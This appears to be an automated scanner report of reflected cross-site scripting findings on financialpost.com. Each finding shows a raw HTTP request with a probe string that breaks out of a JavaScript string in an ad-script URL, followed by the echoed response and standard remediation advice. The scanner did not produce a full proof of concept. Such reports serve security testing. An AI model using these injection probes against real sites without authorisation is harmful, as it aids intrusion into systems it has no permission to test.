P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38763
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d120'%3b5f07c23c576 was submitted in the REST URL parameter 1. This input was echoed as 1d120';5f07c23c576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1d120'%3b5f07c23c576/financials/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a363'%3be5e52d355ae was submitted in the REST URL parameter 2. This input was echoed as 5a363';e5e52d355ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials5a363'%3be5e52d355ae/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7a32'%3ba2f5d539c94 was submitted in the REST URL parameter 1. This input was echoed as a7a32';a2f5d539c94 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa7a32'%3ba2f5d539c94/financials/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 85990
Expires: Sun, 19 Dec 2010 03:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsa7a32';a2f5d539c94/financials/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsa7a32';a2f5d539c94;kw=financials;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=16955960?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c3c6'%3bfd6bcf5f23 was submitted in the REST URL parameter 2. This input was echoed as 4c3c6';fd6bcf5f23 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials4c3c6'%3bfd6bcf5f23/steps+plate/3996039/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 93245
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials4c3c6';fd6bcf5f23/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials4c3c6';fd6bcf5f23;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10193409?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6154'%3b04265ffa851 was submitted in the REST URL parameter 4. This input was echoed as e6154';04265ffa851 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039e6154'%3b04265ffa851/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76201
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/financials/steps-plate/3996039e6154';04265ffa851/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=financials;kw=steps-plate;kw=3996039e6154';04265ffa851;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=59123382?
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf56e'%3bd1d11237fe0 was submitted in the REST URL parameter 5. This input was echoed as cf56e';d1d11237fe0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/financials/steps+plate/3996039/cf56e'%3bd1d11237fe0 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37971
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9749c'%3bea6b87ad49c was submitted in the REST URL parameter 1. This input was echoed as 9749c';ea6b87ad49c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news9749c'%3bea6b87ad49c/legal/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de7ae'%3bad722b91cc3 was submitted in the REST URL parameter 2. This input was echoed as de7ae';ad722b91cc3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/legalde7ae'%3bad722b91cc3/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b9fe'%3beb1408074c9 was submitted in the REST URL parameter 1. This input was echoed as 3b9fe';eb1408074c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news3b9fe'%3beb1408074c9/marketing/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43306
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28044'%3bc70d3668348 was submitted in the REST URL parameter 2. This input was echoed as 28044';c70d3668348 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/marketing28044'%3bc70d3668348/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43269
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d492c'%3b18622a2ecd was submitted in the REST URL parameter 1. This input was echoed as d492c';18622a2ecd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsd492c'%3b18622a2ecd/mining/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36406
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 287dd'%3beeb5abe1ff2 was submitted in the REST URL parameter 2. This input was echoed as 287dd';eeb5abe1ff2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/mining287dd'%3beeb5abe1ff2/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d5c4'%3b688bdb9d235 was submitted in the REST URL parameter 1. This input was echoed as 4d5c4';688bdb9d235 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news4d5c4'%3b688bdb9d235/technology/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 278b5'%3b89821bbfc44 was submitted in the REST URL parameter 2. This input was echoed as 278b5';89821bbfc44 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/technology278b5'%3b89821bbfc44/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63693'%3b5121090781a was submitted in the REST URL parameter 1. This input was echoed as 63693';5121090781a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion63693'%3b5121090781a/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43940
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd052'%3b65c989df336 was submitted in the REST URL parameter 1. This input was echoed as bd052';65c989df336 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionbd052'%3b65c989df336/breaking-views/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37628
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a05'%3b5e640f9eda1 was submitted in the REST URL parameter 2. This input was echoed as 85a05';5e640f9eda1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/breaking-views85a05'%3b5e640f9eda1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44256
